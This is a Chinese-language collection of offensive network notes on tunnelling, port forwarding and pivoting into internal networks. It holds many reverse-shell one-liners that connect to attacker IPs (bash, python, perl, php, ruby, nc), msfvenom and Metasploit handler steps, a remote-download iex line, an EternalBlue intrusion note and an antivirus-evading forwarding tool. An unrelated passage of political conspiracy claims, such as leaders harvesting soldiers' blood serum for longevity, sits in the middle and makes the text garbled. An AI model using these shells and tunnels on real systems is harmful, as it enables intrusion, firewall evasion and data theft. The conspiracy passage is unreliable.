./proxy tcp -p ":1234"-T tcp -P "1.1.1.1:4567"

sudo ./proxy udp -p ":53" -T udp -P "8.8.8.8:53"

参考：https://github.com/snail007/goproxy/blob/master/README_ZH.md的

“普通一级UDP代理”部分。

./gost -L tcp://:1234/1.1.1.1:4567

source

Ncat is a feature-packed networking utility which reads and writes
data across networks from the command line. Ncat was written for the
Nmap Project as a much-improved reimplementation of the venerable
Netcat.

ncat -l localhost 8080--sh-exec"ncat example.org 80"

Ncat is a general-purpose command-line tool for reading, writing, redirecting, and encrypting data across a network. It aims to be your network Swiss Army knife, handling a wide variety of security testing and administration tasks.

一、Ncat 作为浏览器

Ncat 访问网页

二、监听模式（模拟 web 服务器）

三、执行命令（远程 shell）

注：以上情形均支持局域网远程访问，访问时将 IP 地址改为对应数字。

四、访问控制

• 只允许指定客户端连接：ncat -l --allow 10.2.67.204
• 只拒绝指定客户端连接：ncat -l --deny 10.2.67.204
• 只允许指定网段的本地 IP：
  1. ncat -l --allow 10.2.67.0/24
  2. ncat -l --allow 10.2.67.0-255
• 从文件中获取允许访问的地址列表：ncat -l --allowfile trusted_hosts.txt
• 设置最大连接数为5：ncat -l --max-conns 5

五、文件传输

• 传输单个文件

1. 接收者监听：
   receiver$ ncat -l > outputfile
   sender$ ncat --send-only receiver_ip < inputfile
2. 发送者监听：
   sender$ ncat -l --send-only < inputfile
   receiver$ ncat sender_ip > outputfile

• 传输目录

• 传输磁盘镜像（压缩）

六、聊天

• 双人聊天

• 多人聊天

七、简易 web 服务器

• Linux 用户：ncat -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"
• Windows 用户：ncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"

八、流媒体视频

10 个例子教你学会 ncat命令

1. [root@linuxtechi ~]#yum install nmap-ncat -y (在mac上，则是brew install nmap）

例子： 1) 监听入站连接

1. $ ncat -l port_number

1. $ ncat -l 8080

例子： 2) 连接远程系统

1. $ ncat IP_address port_number

1. $ ncat 192.168.1.10080

1. GET / HTTP/1.1

1. GET / HTTP/1.1

1. HEAD / HTTP/1.1

例子： 3) 连接 UDP 端口

1. $ ncat -l -u 1234

1. $ netstat-tunlp |grep1234
2. udp 000.0.0.0:12340.0.0.0:*17341/nc
3. udp6 00:::1234:::*17341/nc

1. $ ncat -v -u {host-ip}{udp-port}

1. [root@localhost ~]# ncat -v -u 192.168.105.15053
2. Ncat:Version6.40( http://nmap.org/ncat )
3. Ncat:Connected to 192.168.105.150:53。

例子： 4) 将 ncat作为聊天工具

1. $ ncat -l 8080

1. $ ncat 192.168.1.1008080

例子： 5) 将 ncat作为代理

1. $ ncat -l 8080| ncat 192.168.1.20080

1. $ mkfifo2way
2. $ ncat -l 80800<2way| ncat 192.168.1.200801>2way

例子： 6) 使用 ncat拷贝文件

1. $ ncat -l 8080>file.txt

1. $ ncat 192.168.1.1008080--send-only < data.txt

例子： 7) 通过 ncat 创建后门

1. $ ncat -l 10000-e /bin/bash

1. $ ncat 192.168.1.10010000

例子： 8) 通过 ncat进行端口转发

1. $ ncat -u -l 80-c 'ncat -u -l 8080'

例子： 9) 设置连接超时

1. $ ncat -w10192.168.1.1008080

例子： 10) 使用 -k选项强制 ncat待命

1. $ ncat -l -k 8080

八九年中國人還有夢想，無非是左夢或右夢。今天的民眾看不到前路，感覺沒有奔頭了；

中國商人賺到1000萬元以上，必須官商勾結；賺到5000萬元以上，商人的命就不在自己手裡了；

共產主義是虛無縹緲的口號。最現實的選擇就是江澤民的「悶聲發大財」；

軍隊形成了以老鄉為基礎的幫派，最大的是山東幫與河南幫。中國人就是愛認地域和血緣。習的軍改初步打破了軍內幫派體系，作戰能力還不行；

貧富分化不可逆轉。掌握貨幣發行權的中共統治者終極思考的問題不是賺錢，而是不惜一切代價保證政權永固，並讓個人生命以更高品質活下去，活得更久；

中共統治者追求永生之術，用士兵血液提煉血清，用於消除器官移植的後遺症；

黨內有人想搞比希特勒還希特勒的統治，這是建立高科技奴隸社會的幻想；

黨國鑒於蘇聯東歐的教訓，必做兩手準備，一手是更兇狠地鎮壓，另一手是預留退路，把子女錢財轉移到外國；

這個在中國是很成熟的啊。這麼多年輕的當兵的，他們是第一梯隊。提煉出來的血清可以很大程度上緩解器官移植以後導致的各種複雜的症狀。你看呐，器官移植啊，有一個巨大問題，就是排異，需要吃藥。而那些藥呢是致癌物。中國器官移植有多少例？為什麼從零七年以後爆發性增長？全世界現在都跑到中國來，參與這個東西。這不重要。包括以前軍隊裡的軍醫，體系裡面的知情人，跑出海外說，也沒掀起什麼波瀾。因為這是一個世界通行的暗渠黑溝。現在中國在全世界哪方面是真正領先的？中國最大優勢是啥呀？人口啊！中國這麼強大的人口基數有多麼豐富的DNA庫啊！這些東西是世界上最頂級的統治階層真正通用的貨幣。不是錢。不是什麼飛機，遊艇。錢都是他們負責印的，他會在乎他掙多少錢？如果你懂得這種技術存在的話，假如你有這方面情報的話，你就會發現，現在社會上發生的一切事情就都可以解釋了。如果人的壽命和身體健康，是以前人的自然的生老病死只有短短的撐死了八、九十年的話，社會就會形成，自然而然地有個良性迴圈。因為生老病死這是最關鍵的一個轉輪。這是人類社會權利也好，財富也好，最核心的。如果你明白了這東西現在可以操作，而且呢是存在著很大的成功率的情況下，你就明白了為什麼有那麼一群人選擇不撒手。但是，作為臺上的領導跟以前也不一樣啦。為啥？他可能死不了啊！也就是說，他對整個會場啊，整個局面的控制能力啊，比以前強的很多。這個領導，他已經積累了三十年的籌碼。

中國人的遺傳基因是選擇私欲的滿足而不是理想的實現。社會最大公約數是消滅貧困；

中國十幾億人沒有宗教信仰，只能靠血腥集權，適用於以家庭為單位的中國人像螞蟻一樣的向心力。胡錦濤之後，換薄，換習，都得走這條路；

中國農耕時代留下的政治文明受到工業文明和資訊文明的衝擊，處於上下不匹配的關鍵時期，最大的隱患是崩盤；

中國只能走民族主義，表現形式是國家集權；

北京風水壞了，四合院文化不適應現代文明的要求。解決方案有三條：一是遷都；二是將行政格局全部重新劃分；三是要建立扁平化的資訊系統和利益分配結構；

中國轉型會很困難很血腥。潮流和國運推著人走，一不小心就沉到水底或被拍到岸邊；

如果你瞭解現在長生不老技術和器官移植技術已經發展到很高很成熟的階段的話，而且你能夠掌握實現這些技術的手段、財力和人脈，你就會明白，掌握最高權力的帝王為什麼遲遲不願放棄權力的原因。不論是誰，追求高科技條件下的生命延續以及健康長壽，本來也是人之常情；但是，問題是江澤民在垂簾聽政依然完善運轉，依然掌握著黨政軍根本大權，中共第三代到第五代的權力交接還沒有進入實質階段，遠沒有完成；而老太上皇不但沒有表現出按照事先約定好的計畫交出權力的應有意願和誠意，而且同時卻熱衷於和新一代領導分享權力，討價還價，試圖保存一部分政治權力，在這種情況下，必然會給中共高層一種惡夢的感覺，這是很自然的事。試想如果新的生命科學成果，使江澤民煥發青春，得到額外的10年甚至20年，甚至更長時間的健康與生命，那這將對中共第五代、第六代意味著什麼？

UDPXD - A general purpose UDP relay/port forwarder/proxy 

udpxd -l 172.16.0.3:53 -b 78.47.130.33 -t 213.133.98.98:53

dig +nocmd +noall +answer google.de a @172.16.0.3
google.de.              135     IN      A       173.194.116.151
google.de.              135     IN      A       173.194.116.152
google.de.              135     IN      A       173.194.116.159
google.de.              135     IN      A       173.194.116.143

IP 78.47.130.33.24239 > 213.133.98.98.53: 4552+ A? google.de. (27)
IP 213.133.98.98.53 > 78.47.130.33.24239: 4552 4/0/0 A 173.194.116.152,
              A 173.194.116.159, A 173.194.116.143, A 173.194.116.151 (91)

IP 172.16.0.3.24239 > 172.16.0.3.53: 4552+ A? google.de. (27)
IP 172.16.0.3.53 > 172.16.0.3.24239: 4552 4/0/0 A 173.194.116.152,
              A 173.194.116.159, A 173.194.116.143, A 173.194.116.151 (91)

udpxd -l 172.17.0.1:123 -b 78.47.130.33 -t 178.23.124.2:123
udpxd -l 172.17.0.2:123 -b 78.47.130.33 -t 5.9.29.107:123
udpxd -l 172.17.0.3:123 -b 78.47.130.33 -t 217.79.179.106:123

server 172.17.0.1 iburst dynamic
server 172.17.0.2 iburst dynamic
server 172.17.0.3 iburst dynamic

ntpq> peers
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*172.17.0.1      131.188.3.221    2 u   12   64    1   18.999    2.296   1.395
 172.17.0.2      192.53.103.104   2 u   11   64    1    0.710    1.979   0.136
 172.17.0.3      130.149.17.8     2 u   10   64    1   12.073    5.836   0.089

14:13:32.534832 IP 10.10.10.1.123 > 172.17.0.1.123: NTPv4, Client, length 48
14:13:32.556627 IP 172.17.0.1.123 > 10.10.10.1.123: NTPv4, Server, length 48
14:13:33.535081 IP 10.10.10.1.123 > 172.17.0.2.123: NTPv4, Client, length 48
14:13:33.535530 IP 172.17.0.2.123 > 10.10.10.1.123: NTPv4, Server, length 48
14:13:34.535166 IP 10.10.10.1.123 > 172.17.0.1.123: NTPv4, Client, length 48
14:13:34.535278 IP 10.10.10.1.123 > 172.17.0.3.123: NTPv4, Client, length 48
14:13:34.544585 IP 172.17.0.3.123 > 10.10.10.1.123: NTPv4, Server, length 48
14:13:34.556956 IP 172.17.0.1.123 > 10.10.10.1.123: NTPv4, Server, length 48
14:13:35.535308 IP 10.10.10.1.123 > 172.17.0.2.123: NTPv4, Client, length 48
14:13:35.535742 IP 172.17.0.2.123 > 10.10.10.1.123: NTPv4, Server, length 48
14:13:36.535363 IP 10.10.10.1.123 > 172.17.0.1.123: NTPv4, Client, length 48
...

14:13:32.534944 IP 78.47.130.33.63956 > 178.23.124.2.123: NTPv4, Client, length 48
14:13:32.556586 IP 178.23.124.2.123 > 78.47.130.33.63956: NTPv4, Server, length 48
14:13:33.535188 IP 78.47.130.33.48131 > 5.9.29.107.123: NTPv4, Client, length 48
14:13:33.535500 IP 5.9.29.107.123 > 78.47.130.33.48131: NTPv4, Server, length 48
14:13:34.535255 IP 78.47.130.33.56807 > 178.23.124.2.123: NTPv4, Client, length 48
14:13:34.535337 IP 78.47.130.33.56554 > 217.79.179.106.123: NTPv4, Client, length 48
14:13:34.544543 IP 217.79.179.106.123 > 78.47.130.33.56554: NTPv4, Server, length 48
14:13:34.556932 IP 178.23.124.2.123 > 78.47.130.33.56807: NTPv4, Server, length 48
14:13:35.535379 IP 78.47.130.33.22968 > 5.9.29.107.123: NTPv4, Client, length 48
14:13:35.535717 IP 5.9.29.107.123 > 78.47.130.33.22968: NTPv4, Server, length 48
14:13:36.535442 IP 78.47.130.33.24583 > 178.23.124.2.123: NTPv4, Client, length 48
...

• added ipv6 support (see below)
• udpxd now forks and logs to syslog if -d (-v) is specified

udpxd -l [::1]:53 -t [2001:4860:4860::8888]:53

udpxd -l [::1]:53 -t 8.8.8.8:53

udpxd -l 127.0.0.1:53 -t [2001:4860:4860::8888]:53

外网vps : nc –lvp port
内网机器：nc ip port

外网vps: nc –u –lvp 53
内网机器:
windows: nslookup www.baidu.com vps-ip
linux：dig @vps-ip www.baidu.com

外网vps : nc –lvp 80 (or 8080等)
内网机器 ： curl vps-ip:8080

外网vps：抓包、tcpdump icmp
内网机器:直接ping

查看网络连接看是否有连接其他机器的8080（不绝对）等端口，尝试ping –n 1 –a ip
是否有hostname类似于proxy的机器
IE直接代理情况

reg query "HKEY_USERS\[SID]\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

reg query "HKEY_USERS\[SID]\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

    function islocalip(ip) {
           return isInNet(ip, "127.0.0.0", "255.0.0.0") ||
                     isInNet(ip, "169.254.0.0", "255.255.0.0") ||
                     isInNet(ip, "10.0.0.0", "255.0.0.0") ||
                     isInNet(ip, "192.168.0.0", "255.255.0.0") ||
                     }
    function FindProxyForURL(url, host) {
           var DefaultScanner = "PROXY 172.16.10.168:8080; DIRECT";
           var target_ip = dnsResolve(host);
           if (islocalip(target_ip)) {
                         return 'DIRECT';
           } else {
                  return DefaultScanner;
           }
    }

curl        www.baidu.com      //不通 
curl –x     proxy-ip:8080 www.baidu.com   //通
icmp        ping baidu.com 
http        curl -i  baidu.com 
tcp         telnet baidu.com 
dns         nslookup baidu.com    //当然这里不一定非要百度

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
python -c 'import pty; pty.spawn("/bin/bash")'

searchsploit ms17  |grep py  只匹配py脚本
searchsploit -p 41891.rb 复制完整路径并显示详细信息
searchsploit -m 41891.rb 复制到当前目录
searchsploit -w ms17-010  显示exploit-db在线结果

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

mknod backpipe p && telnet 173.214.173.151 8080 0backpipe

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

net.ipv4.ip_forward = 1

service iptables stop

iptables -t nat -A PREROUTING --dst 192.168.206.129 -p tcp --dport 3389 -j DNAT --to-destination 192.168.206.101:3389
iptables -t nat -A POSTROUTING --dst 192.168.206.101 -p tcp --dport 3389 -j SNAT --to-source 192.168.206.129

service iptables save && service iptables start

$ ./ew -s lcx_listen -l  1080   -e 8888
$ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999

a) lcx_tran 的用法
    $ ./ew -s ssocksd  -l 9999
    $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) lcx_listen、lcx_slave 的用法
    $ ./ew -s lcx_listen -l 1080 -e 8888
    $ ./ew -s ssocksd    -l 9999
    $ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=12345 -f exe -o ./shell.exe

python proxy.py -u http://xxxx.com/conn.jsp  -l 3333 -r 12345 v

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set LPORT 3333

ssh -CfNg -L port1:127.0.0.1:port2 user@host    #本地转发

ssh -CfNg -R port2:127.0.0.1:port1 user@host    #远程转发

ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip   #正向隧道，监听本地port

ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip  

ssh -qTfnN -D port remotehost

-q      #安静模式
-T      #不占用shell
-f      #后台运行，推荐加-n参数
-N      #不执行远程命令

netsh interface portproxy set v4tov4 listenaddress=192.168.206.101 listenport=3333 connectaddress=192.168.206.100 connectport=3389

此工具适用于，有一台双网卡服务器，你可以通过它进行内网通信，比如这个，你连接192.168.206.101:3388端口是连接到100上面的3389

netsh interface portproxy delete v4tov4 listenport=9090

netsh interface portproxy show all

netsh interface ipv6 install

1、 nc -e /bin/sh -lp 1234
    nc -e /bin/sh 223.8.200.234 1234
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 
    nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

2、  mknod /tmp/backpipe p
    /bin/sh 0

lcx 内网转发

本地:lcx.exe -listen 1234 6666

肉鸡:lcx.exe -slave my_ip 1234 127.0.0.1 3389

reGeorg

socks5 127.0.0.1 4444

Tunna[速度较慢]

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v 
rdesktop 127.0.0.1:1234

Linux portmap 端口映射

./portmap -m 2 -p1 6666 -h2 8.8.8.8 -p2 7777    #先在外网执行
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 8.8.8.8 -p2 6666  #在内网shell下执行
ssh 127.0.0.1 -p 7777   #在外网机器上执行

1. 在B服务器上运行：
    ./rtcp.py l:10001 l:10002
表示在本地监听了10001与10002两个端口，这样，这两个端口就可以互相传输数据了
2. 在A服务器上运行：
    ./rtcp.py c:localhost:22 c:222.2.2.2:10001
表示连接本地的22端口与B服务器的10001端口，这两个端口也可以互相传输数据了
3. 然后我们就可以这样来访问A服务器的22端口了：
    ssh 222.2.2.2 -p 10002
如果报错ssh_exchange_identification: read: Connection reset by peer  解决方法chmod 400 /etc/ssh/*

第一步 运行proxy.py 并指定端口 python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v
第二步 本地执行  rdesktop 127.0.0.1:1234
python2.7 proxy.py -u http://x.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389   #-a指定内网的机器

服务端      htran.exe -s -bind 8888
客户端      SocksCap:SOCKS Version 5 服务端IP:8888

客户端      htran.exe -s -listen 1234 8888
服务端      htran.exe -s -connect 客户端IP 1234
客户端      SocksCap:SOCKS Version 5 127.0.0.1:8888

服务端      htran.exe -p -tran 8888 127.0.0.1 3389
客户端      RDP 服务端IP:8888

客户端      htran.exe -p -listen 1234 8888
服务端      htran.exe -p -slave 客户端IP 1234 127.0.0.1 3389
客户端      RDP 127.0.0.1:8888

bash
vi /etc/sysctl.conf #将net.ipv4.ip_forward=0更改为net.ipv4.ip_forward=1 开启转发功能
sysctl -p   #使数据转发功能生效
iptables -t nat -A PREROUTING --dst 192.168.46.129 -p tcp --dport 81 -j DNAT --to-destination 172.24.20.25:80 #把本地192.168.46.129的81端口转为目标172,24.20.25的80端口
iptables -t nat -A POSTROUTING --dst 172.24.20.25 -p tcp --dport 80  -j SNAT --to-source 192.168.46.129   #172.24.20.25:80返回时 将ip修改为192.168.46.129

端口转发之PowerShell

Victim IP : 192.168.52.1
Attacker IP : 192.168.52.129

Attacker:
    nc -lvp 4444
Victim:
    PS F:\Shells> . .\Invoke-PowerShellTcp.ps1
    PS F:\Shells> Invoke-PowerShellTcp -Reverse -IPAddress 192.168.52.129 -Port 4444

Victim:
    PS F:\Shells> . .\Invoke-PowerShellTcp.ps1
    PS F:\Shells> Invoke-PowerShellTcp -Bind -Port 8888
Attacker:
    PS F:\Shells> . .\powercat.ps1
    PS F:\Shells> powercat -c 192.168.52.1 -v -p 8888

Attacker:
    nc -lvup 53
Victim:
    PS F:\Shells> . .\Invoke-PowerShellUdp.ps1
    PS F:\Shells> Invoke-PowerShellUdp -Reverse -IPAddress 192.168.52.129 -Port 53

Victim:
    PS F:\Shells> . .\Invoke-PowerShellUdp.ps1
    PS F:\Shells> Invoke-PowerShellUdp -Bind -Port 7777
Attacker:
    nc -vtu 192.168.52.1 7777

Attacker:
    PS F:\Shells> . .\Invoke-PoshRatHttps.ps1
    PS F:\Shells> Invoke-PoshRatHttps -IPAddress 192.168.52.1 -Port 80 -SSLPort 443
Victim:
    PS C:\> iex (New-Object Net.WebClient).DownloadString("http://192.168.52.1/connect")

Attacker:
    root@kali:~# ruby dnscat2.rb shellcome.com
Victim:
    PS F:\Shells> . .\powercat.ps1
    PS F:\Shells> powercat -c 192.168.52.131 -v -dns shellcome.com -ep

metasploit

meterpreter> run autoroute -s 192.168.1.0/24
meterpreter> use auxiliary/server/socks4a
msf> route add 192.168.1.0 255.255.255.0 192.168.1.1 [sessionid]

防火墙开启的ms17-010

1、上传EarthWorm转发端口445到指定端口,然后利用eternalblue+Doublepulsar溢出目标8888端口，成功回弹系统权限的shell
2、由于防火墙限制（也可能其他），直接添加管理员始终不能成功
3、上传工具，获取管理员密码hash破解，成功登陆3389
./ew -s lcx_tran -l 8888 -f 127.0.0.1-g 445

Socks代理工具

Earthworm            http://rootkiter.com/EarthWorm
xsocks            https://github.com/5loyd/xsocks
ShadowSOCKS（影梭）    https://github.com/shadowSOCKS
SocksCap64        http://www.sockscap64.com/
proxychains        http://proxychains.sourceforge.net/

-------------------------------------------------------

内网漫游之SOCKS代理大结局 

lcx.exe –slave 139.XXX.XX.113 9000 10.48.128.25 3389

lcx.exe –listen 9000 5555

ew –s ssocksd –l 888

ew -s rcsocks -l 1008 -e 888

ew -s rssocks -d 139.XXX.XX.113 -e 888

ew -s ssocksd -l 888

ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888

ew –s lcx_listen –l 10800 –e 888

ew -s ssocksd -l 999

ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.49 -g 999

ew -s rcsocks -l 1080 -e 888

ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999

ew -s lcx_listen -l 999 -e 777

ew -s rssocks -d 10.48.128.12 -e 777

vi /etc/proxychains.conf
# 顺便补充下LINUX下Vim编辑器简单使用方法

proxyresolv www.baidu.com

cp /usr/lib/proxychains3/proxyresolv /usr/bin/

from https://www.anquanke.com/post/id/85494
---------------------------------------------------------------

内网穿透方式与思路总结

0x00 前言

本文主要来探讨一下内网穿透方式与思路总结。在开始之前，需要先设置一个前提即已经具有目标内网中的一台主机的任意命令执行的权限，比如：webshell或者某个service的RCE漏洞。我们这里的目标是要绕过可能存在的防火墙，IDS/IPS或者深度包检测系统从而拿到目标内网主机的shell并进而穿透内网以便实施内网渗透。

0x01 实验与分析

实验环境的搭建：
这里我使用VirtualBox新建了一个NAT网络(10.0.2.0/24)来模拟内网以及一台Kali主机(192.168.0.230)来模拟外网主机，具体如下：

• 内网地址(NAT网络)：10.0.2.0/24
• 内网主机A(Windows)：10.0.2.15
• 内网主机B(Linux)：10.0.2.5
• 内网出口地址(NAT出口地址)：192.168.7.225
• 外网主机：192.168.0.230

网络拓扑如下：

现在假设我们已经拥有了MyLab网络中的Linux或者Windows的代码执行权限，我们的目标是在我们的攻击机Kali主机上成功获取到内网主机的shell。
场景与思路分析：
场景一：内网防火墙对出口流量没有任何端口限制
思路：由于防火墙对出口流量没有任何端口限制，我们的可选择的方案非常灵活，如：反弹shell
方法：
1. Windows:

nc.exe -nv 192.168.0.2308080-e cmd.exe

2. Linux: 
1）Netcat

nc -nv 192.168.0.2308080-e /bin/bash

mknod /tmp/p p &&/bin/sh 0</tmp/p | nc 192.168.0.23080801>/tmp/p

2）Ncat

ncat -nv 192.168.0.2308080-e /bin/bash

3）Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.230",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4）PHP

php -r '$sock=fsockopen("192.168.0.230",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

5）Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.230","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

6）Perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.230:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

7）Bash

bash -i >&/dev/tcp/192.168.0.230/80800>&1

0<&196;exec 196<>/dev/tcp/192.168.0.230/8080; sh <&196>&1962>&196

/bin/bash -i >/dev/tcp/192.168.0.230/80800<&12>&1

场景二：内网防火墙仅允许内网主机访问外网的特定端口（如：80, 443）

思路：由于防火墙仅允许部分特定外网端口可以访问，思路一仍然是反弹shell只不过目标端口改成特定端口即可；思路二则是端口转发，将内网主机的某些服务的端口转发到外网攻击主机上的防火墙允许的特定端口上，再通过连接外网主机上的本地端口来访问内网服务
方法一：反弹shell可参考场景一中的方法，仅需修改目标端口为防火墙允许的特定端口即可
方法二：端口转发
1. Windows

• lcx.exe （最常见，但也是最容易被反病毒检测到）
• PortTransfer.exe （参考http://avfisher.win/archives/318）

2. Linux (SSH远程端口转发，以允许的特定端口为80为例)
1）在外网主机上将ssh的22端口映射到80端口

$ apt-get install rinetd
$ vim /etc/rinetd.conf
# bindadress    bindport    connectaddress    connectport
192.168.0.23080192.168.0.23022

2）内网主机上SSH远程端口转发如下

ssh root@192.168.0.230-p 80-f -N -R 2022:127.0.0.1:22
(输入外网主机的SSH口令)

3）在外网主机上直接ssh内网主机如下

ssh -p 2022 avfisher@127.0.0.1
(输入内网主机的SSH口令)

方法三：SSH的动态端口转发配合proxychains来代理所有流量进一步渗透内网
1）在内网主机上执行

ssh -f -N -R 2222:127.0.0.1:22-p 80 root@192.168.0.230
(输入外网主机的SSH口令)

2）在外网主机上执行

ssh -f -N -D 127.0.0.1:8080-p 2222 avfisher@127.0.0.1
(输入内网主机的SSH口令)

3）在外网主机上配置proxychains设置socks4代理

$ vim /etc/proxychains.conf
[ProxyList]
socks4 127.0.0.18080

4) 使用proxychains代理所有流量进入内网

proxychains nc -nv 10.0.2.53306

场景三：内网防火墙具有协议检测和识别能力且仅允许HTTP流量出去外网

思路：由于防火墙仅允许HTTP流量出去外网，可选择的方案将会受到很大限制，但是其中一种方案是HTTP隧道技术
方法：将payload的协议封装在HTTP协议中

1）在外网主机上安装brigde (https://github.com/luizluca/bridge)

$ git clone https://github.com/luizluca/bridge
$ cd bridge
$ ruby bridge 80/bridge
$ nc -lvvp 8080

2）在内网主机上安装bridge

$ git clone https://github.com/luizluca/bridge
$ cd bridge
$ ruby bridge 8080 http://192.168.0.230:80/bridge 192.168.0.2308080
$ nc -nv 127.0.0.18080-e /bin/bash

一旦建立了HTTP隧道，后面的操作可以结合前2个场景中的方法。
场景四：内网具备深度包检测能力且仅允许HTTP流量出去外网但可以检测明文传输的HTTP流量
思路：该场景比场景三更加苛刻，在场景三中我们将流量封装在HTTP协议中来Bypass检测，但是流量本身都是明文传输，所以一旦目标内网检测HTTP流量，我们还是可能被拦截，因此我们需要对场景三中的思路稍加修改，即利用SSL或者SSH加密流量在结合HTTP隧道技术。这样封装在HTTP协议中的流量本身也是加密的，检测系统就无法发现真实的payload了。
方法：利用SSL或者SSH加密流量在结合HTTP隧道技术

1）与场景三中的方法类似，先在外网主机上安装brigde

$ git clone https://github.com/luizluca/bridge
$ cd bridge
$ ruby bridge 80/bridge

2）在外网主机上开启使用了ssl加密的ncat监听进程，如下

ncat -lvvp 8080--ssl

3）在内网主机上安装bridge

$ git clone https://github.com/luizluca/bridge
$ cd bridge
$ ruby bridge 8080 http://192.168.0.230:80/bridge 192.168.0.2308080

4）同样地，在内网主机上使用ssl与监听主机通信

ncat -nv 127.0.0.18080-e /bin/bash --ssl

SSH加密端口转发流量的操作可参照场景二中的方法二和三。

场景五：内网主机完全与外网不通
思路：既然该内网主机与外网都不通，那为什么还浪费时间非要借助于这个主机来做内网穿透呢？换个思路，找个能通的内网主机在穿透出来吧。
方法：都找到了能通外网的内网主机了，那么其他场景里提到的方法应该就能解决你的问题了吧…

0x02 小结

本文尝试从不同场景切入分析和总结，从内网限制的宽松到严苛，来逐个探讨可行的Bypass方案，算是抛砖引玉吧，更多地方法和思路会不断丰富和更新进来。

from  http://web.archive.org/web/20191108165618/http://avfisher.win/archives/733
--------

Windows上的一个端口转发工具

一.前言

lcx是个非常经典的转发工具，但是lcx现在被杀的厉害。而据说，源码免杀才是王道。所以，我产生了自己编写个功能类似lcx的端口转发工具的想法。写完后经过10多天的测试。现在发布正式版v1.0。

二.程序特色（相对lcx.exe而言)

1.不会秒断。（重点）相信玩过内网，或者服务器3389需要转发的很多人都遇到过一个问题，就是lcx有些时候会秒断，导致以后无法正常远程登录。本程序可以抗秒断，这个是经 过实际测试的。有一位机油使用lcx转发，远程登录时秒断，无法正常连接。我上去，使用本程序直接秒杀，连接一直很正常。
2.免杀 写本程序的初衷，是因为lcx被杀的太厉害了，而lcx又很喜欢，我比较喜欢，所以就萌生了自己写一个类似功能的工具的想法。源码免杀才是王道，这是写本程序的出发点。免杀证明：http://r.virscan.org/report/ab95ca1a134a0a1a9d4c82c387e9fc7a.html

三.程序简介

1.程序说明：
我没有读过Lcx的源码，本软件是由我自己构思和编写的，只是功能与lcx.exe类似而已。
2.程序用法：

PortTransfer.exe -listen leftPort rightPort -remote leftIp leftPort rightIp rightPort -trans  leftPort rightIp rightPort

3.程序抽象：
我把远程连接到目的主机想象成从左到右的连接。mstsc在左，远程主机在右.这样，left与right意思就很明显了，难道不是吗？ 4.使用实例： 假设虚拟机中有Windows XP系统，物理主机需要远程连接它。我们可以这样：（假设物理主机IP地址为1.1.1.1)
1).物理机上，执行

PortTransfer.exe -listen 5001 5002

2).虚拟机中，执行

PortTransfer.exe -remote 1.1.1.1 5002 127.0.0.1 3389

3).物理机中，执行

PortTransfer.exe -trans   6001 127.0.0.1 5001

这一步可以不要，也可以使用多次。添加-trans功能，是为了支持多跳转发，2跳，3跳，4跳，等等，应该都是可以的。也就是说，这一步可以执行0次，或者n次. 4).然后，启动mstsc，连接本机 6001 端口，既可连上。 5.支持平台：Windows XP/2003/2003 r2/2008/2008 r2/Vista/7/8。32和64位机器均可以使用。如果以后有需要，可能会发布linux版。至于其他平台，为测试过，如果不支持，也将不予考虑支持。

四.后记

1.关于版权：既然是发布出来的，仅供测试，请勿用于非法目的。
2.说明：程序必然还存在bug或者不合理的地方，欢迎反馈。如果有必要，我会更新的。反馈就写在本帖的评论中。

五.下载地址

链接: http://pan.baidu.com/s/1i4OQyUD密码: a5kn

Contents

